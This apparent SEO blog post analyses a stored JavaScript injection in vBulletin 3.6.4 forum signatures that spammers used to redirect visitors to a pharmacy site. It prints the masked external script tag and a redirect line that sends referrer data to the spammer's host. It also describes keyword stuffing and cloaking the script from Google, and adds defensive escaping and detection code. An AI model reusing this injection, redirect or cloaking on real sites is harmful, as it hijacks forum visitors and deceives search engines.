VBulletin Javascript Injections Alive and Well

    So I feel this blog has lately been lacking the shadiness I so enjoy, so I decided I’d spew out some extra-saucy blackhat stuff. I would like to thank the ONE comment spammer who spams this blog, whoever he is, for inadvertently pointing this trick out to me through his total lack of stealth.

    I’m aware this is not a new vulnerability, but I was not aware it was in the wild. So here’s some specs.

    Preface: I have no idea if this is legal. I have never used it or tested it myself. This is all just picking apart someone else’s work. If you use it (which I do not recommend), I’m not responsible for whatever nastiness might happen. This is as much for blackhats (many of whom use it) as it is for whitehats (who perhaps should patch their effin shit).

    The Software: VBulletin. The version the injection in question showed up on was 3.6.4, but earlier versions are probably vulnerable too. Blatantly unpatched on this server. Oy. And this was on a popular VBulletin forum, Pagerank 5.

    The Vulnerability: Javascript injection into the “Sig” field. The injected script executes when one views the member profile, and possibly when one views a thread.

    The Implementation:
    I received a spam for URL http://forum.xxxxxxxx.com/member.php?u=7918
    I clicked it, and was amazingly redirected over to a standard pharmaceutical website. GASP!

    The Injection:
    It would appear that they set this as the “sig” of their user profile. Before the actual javascript came a series of relevant words, to bring in search results and send the users to the URL. Here’s the code, though (the host is masked):
    <script src="http://yyyyyyyyyy.info/ss.js"></script>

    The Javascript (quotes repaired from the blog’s curly-quote rendering; $keyword and $se are filled in server-side):
    window.location=("http://yyyyyyyy.info/in.cgi?12&seoref="+encodeURIComponent(document.referrer)+"&meter=$keyword&se=$se&ur=1&HTTP_REFERER="+encodeURIComponent(document.referrer)+"&default_keyword=phentermine");

    The entire point of the above is just stat taking. It records the referrer and search-engine information, and sets the keyword so the server knows which product to redirect visitors to. It then just fires them off to his real page.
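    The root cause is that the signature field is rendered into the profile page as raw HTML, so a stored <script> tag runs in every visitor’s browser. The following is an added example (not vBulletin’s code and not the spammer’s script) showing the two controls a forum operator would want: escape the signature on output so markup renders as text, and flag submissions that carry script markup so they can be logged and reviewed. The sample signatures are constructed; the host placeholder.invalid is a placeholder, not a real domain.

```javascript
// Added example, not vBulletin code: output-escape a user-controlled
// "signature" field and flag submissions that look like script injection.

// Escape the five characters that matter when inserting text into HTML.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Markup that has no business in a forum signature. The escape step above is
// the real control; these patterns exist for detection and moderator review.
const SUSPICIOUS = [
  { name: 'script-tag',      re: /<\s*script\b/i },
  { name: 'external-script', re: /<\s*script\b[^>]*\bsrc\s*=/i },
  { name: 'event-handler',   re: /\bon[a-z]+\s*=/i },
  { name: 'javascript-url',  re: /javascript\s*:/i },
  { name: 'iframe',          re: /<\s*iframe\b/i },
];

// Return the names of every pattern the signature matches (empty = clean).
function scanSignature(sig) {
  return SUSPICIOUS.filter((p) => p.re.test(sig)).map((p) => p.name);
}

// Render the signature the safe way: as text inside the template, never as HTML.
function renderSignature(sig) {
  return '<div class="signature">' + escapeHtml(sig) + '</div>';
}

// Combine both controls: what gets stored/rendered, and whether to alert.
function review(sig) {
  const findings = scanSignature(sig);
  return { flagged: findings.length > 0, findings, html: renderSignature(sig) };
}

// Constructed sample inputs. The second mimics the shape of the injection
// described in the post, with a placeholder host.
const SAMPLES = {
  clean: 'Proud member since 2007 - visit my homepage',
  injected: 'cheap pills fast shipping <script src="http://placeholder.invalid/ss.js"></script>',
};

for (const [label, sig] of Object.entries(SAMPLES)) {
  const r = review(sig);
  console.log(label, r.flagged ? 'FLAGGED ' + r.findings.join(',') : 'ok', '->', r.html);
}
```

    With the escape in place the stored payload still exists in the database, but the profile page shows it as literal text and no redirect fires; the scan is what tells a moderator that an account is worth looking at.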

    What is the Point of This?
    It’s all about the long tail, baby. By putting relevant keywords in the sig/name, he creates a lot of longtail juice. Remember, he’s probably doing this at 20k+ forums. So let’s say 30 keywords per sig. 20,000*30=600,000 longtail words relevant to his subject (phentermine). Whenever someone goes to one of these profiles from a search engine, it shoves them over to his site. Little to no risk for his own domains. Really, he doesn’t even NEED to be indexed by Google to get traffic.

    How Can one Ever Hope to Rank a Profile?
    By spamming out the link to the profile itself, using the username/anchor text of whatever drug he’s spamming that day. Once he does that, any search for his drug plus any of the longtail words will rank the profile much higher than it would organically, without any such promotion.

    Why Doesn’t Google Detect This?
    He uses external Javascript, which Google does not generally fetch. As an added precaution, most people cloak the Javascript file so it shows up as blank for any Google IP that goes to fetch it.

    What Should I do With This?
    Patch your DAMN shit.

    Don’t You Feel Bad about Calling out a Blackhat?
    Nope. I’m not calling him out. I modified ALL URLs so they aren’t accessible, and this trick is commonly known. I’d be very surprised if VBulletin didn’t patch this, and quite frankly, I’m surprised it existed in the first place.


    2 Responses to “VBulletin Javascript Injections Alive and Well”

    1. handsome rob says:

      I enjoy your posts, but this:

      http://tinypic.com/view.php?pic=8fbjndu&s=1

      is annoying as hell.

    2. admin says:

      Oh hell. I’ll disable that plugin. Whenever you see this, please come back and tell me if that shows up still.

    © Slightly Shady SEO, All Rights Reserved. Scrape me, and I will eat your soul.